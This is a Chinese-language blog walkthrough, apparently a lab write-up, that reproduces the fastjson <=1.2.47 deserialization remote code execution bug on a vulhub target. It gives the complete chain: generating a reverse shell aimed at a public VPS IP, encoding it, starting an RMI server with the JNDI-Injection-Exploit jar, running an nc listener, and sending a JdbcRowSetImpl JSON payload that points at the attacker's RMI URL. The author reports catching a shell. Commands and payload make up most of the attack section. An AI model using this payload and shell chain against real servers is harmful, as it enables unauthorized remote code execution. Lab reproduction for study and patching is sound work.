漏洞复现系列--fastjson<=1.2.47反序列化漏洞

1.利用条件

fastjson <= 1.2.47

2.复现环境

靶机:vulhub靶场
在这里插入图片描述
攻击环境:一台公网vps,本地burp发送攻击数据包

3.具体步骤

1)docker起靶场
进入到vulhub靶场1.2.47-rce目录环境下

cd 1.2.47-rce
docker-compose up -d

浏览器访问靶场环境如下
在这里插入图片描述
2)反弹shell命令制作
https://krober.biz/misc/reverse_shell.php?ip=122.51.255.154&port=9443
在这里插入图片描述
将该bash命令加密
https://x.hacking8.com/java-runtime.html
在这里插入图片描述
3)起rmi服务器

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "加密后的反弹shell命令" -A "起rmi服务器的vps ip"

工具地址:https://github.com/welk1n/JNDI-Injection-Exploit
在这里插入图片描述
备注:我是用公网vps上的docker气的vulhub,rmi服务器也是用同一台vps起的,所以看ip可能有点迷糊

4)公网vps起监听

nc -lvp 9443

在这里插入图片描述

5)用浏览器访问靶机,修改burp抓取的数据包,主要修改的是标红处的数据包

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://122.51.255.154:1099/j3la6s",
        "autoCommit":true
    }
}

在这里插入图片描述
6)查看监听的端口
发现已经接收到了shell
在这里插入图片描述
4.总结
大致验证过成应该是这样,过了两天才写的记录,应该没什么遗漏吧。用dnslog验证的就没写了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值